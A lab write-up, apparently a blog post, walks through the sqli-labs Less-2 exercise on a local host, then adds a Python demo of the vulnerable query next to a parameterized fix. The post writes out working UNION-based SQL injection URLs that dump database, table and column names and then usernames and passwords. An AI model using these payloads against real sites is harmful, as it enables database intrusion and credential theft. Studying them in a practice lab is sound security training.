Less-2 [Error-based injection]

Test with a single quote and and 1=1.
The error message shows the problem is the quoting: after --+ the trailing LIMIT 0,1 has no closing quote, and the single quote we added did not close anything either. This indicates that id=1 is probably not wrapped in quotes at all and is passed straight into the database query.
Remove the single quote and test again.
Use order by xx to guess the number of columns. Result: 3 columns.
Test the injection point with union select. Columns 2 and 3 can carry injected values.
Dump a single database name
127.0.0.1/sqli-labs/Less-2/?id=-1%20union%20select%201,(select%20schema_name%20from%20information_schema.schemata%20limit%202,1),3--+
Dump all database names
http://127.0.0.1/sqli-labs/Less-2/?id=-1%20union%20select%201,(select%20group_concat(schema_name)%20from%20information_schema.schemata),3--+
Dump all table names
http://127.0.0.1/sqli-labs/Less-2/?id=-1%20union%20select%201,(select%20group_concat(table_name)%20from%20information_schema.tables),3--+
Dump the column names
http://127.0.0.1/sqli-labs/Less-2/?id=-1%20union%20select%201,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27),3--+
Read the actual username and password columns
http://127.0.0.1/sqli-labs/Less-2/?id=-1%20union%20select%201,(select%20group_concat(username)%20from%20users),(select%20group_concat(password)%20from%20users)--+
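To show why the unquoted integer id in Less-2 needs no closing quote, and what the fix looks like, here is an added Python example (not from the post or from sqli-labs) that rebuilds the Less-2 query shape over a constructed in-memory SQLite users table and contrasts it with an integer-validated, parameterized version. Table contents and column names are constructed for the example.

```python
import sqlite3

# Constructed stand-in for the sqli-labs users table (sample rows, not real data).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "hash-a"), (2, "bob", "hash-b")])
    return conn

def lookup_vulnerable(conn, user_input):
    """Less-2 shape: the id is concatenated unquoted, so no closing quote is
    needed; a UNION plus a comment can be appended straight after the number,
    and a stray single quote produces the SQL syntax error seen in the post."""
    sql = f"SELECT id, username, password FROM users WHERE id={user_input} LIMIT 0,1"
    return conn.execute(sql).fetchall()

def lookup_hardened(conn, user_input):
    """Validate that the id is an integer, then bind it as a parameter so the
    value is always data and never becomes part of the SQL text."""
    try:
        user_id = int(user_input)
    except (TypeError, ValueError):
        raise ValueError("id must be an integer")
    sql = "SELECT id, username, password FROM users WHERE id=? LIMIT 0,1"
    return conn.execute(sql, (user_id,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    payload = "-1 union select 1,username,password from users--"
    print(lookup_vulnerable(db, "2"))        # the intended single row
    print(lookup_vulnerable(db, payload))    # every user, via the UNION
    print(lookup_hardened(db, "2"))          # same intended row
    try:
        lookup_hardened(db, payload)
    except ValueError as err:
        print("rejected:", err)              # payload never reaches the database
```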
 
posted @ 2020-10-26 11:20  峰中追风  views (146)  comments (0)
